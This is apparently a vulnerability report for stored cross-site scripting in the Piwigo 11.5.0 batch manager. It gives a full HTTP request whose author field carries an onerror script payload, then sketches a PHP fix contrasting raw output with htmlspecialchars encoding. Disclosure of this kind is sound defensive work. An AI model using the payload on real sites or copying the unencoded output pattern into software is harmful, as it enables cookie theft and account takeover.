Persistent Cross Site Scripting in Batch Manager(version:11.5.0) #1476

Open
@KevDe17

Description:
In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting.
Vulnerable Instances:
/admin.php?page=batch_manager&mode=unit
[image: affected source code file]

request

POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
Cookie:  pwg_id=mof6jca30q9tr1qu48hhvqi143
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit

suggestion
Restrict user input and output
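
The suggestion above, sketched as an added example (not part of the original issue and not Piwigo's own code): it decodes the form body shown in the request and contrasts echoing the stored author value raw with encoding it at output. The function names and the comma-separated `element_ids` format are assumptions.

```php
<?php
// Added illustration; function names are hypothetical, not Piwigo's API.

// Constructed sample: the form body from the request in the report.
$body = 'element_ids=4&name-4=test'
      . '&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11'
      . '&date_creation-4=&level-4=0&description-4=&submit=Submit';

/** Collect the per-image text fields (name-<id>, author-<id>, ...) from the form body. */
function collect_unit_fields(string $body): array
{
    parse_str($body, $post);            // URL-decodes values; hyphens in keys are kept
    $rows = [];
    // Assumption: element_ids is a comma-separated list of image ids.
    foreach (explode(',', (string)($post['element_ids'] ?? '')) as $id) {
        if (!ctype_digit($id)) {
            continue;                   // input side: ids must be plain integers
        }
        foreach (['name', 'author', 'description'] as $field) {
            $rows[(int)$id][$field] = (string)($post[$field . '-' . $id] ?? '');
        }
    }
    return $rows;
}

/** Output side: encode a stored value for HTML text or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$rows   = collect_unit_fields($body);
$author = $rows[4]['author'];

// Before: the stored value is written into the page as markup,
// so the <img> element and its onerror handler are live for every viewer.
$unsafe = '<td class="author">' . $author . '</td>';

// After: the same stored value, encoded when rendered, is inert text.
$safe = '<td class="author">' . h($author) . '</td>';

echo $unsafe, PHP_EOL, $safe, PHP_EOL;
```

Encoding at render time covers values already stored in the database, which input filtering alone does not.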
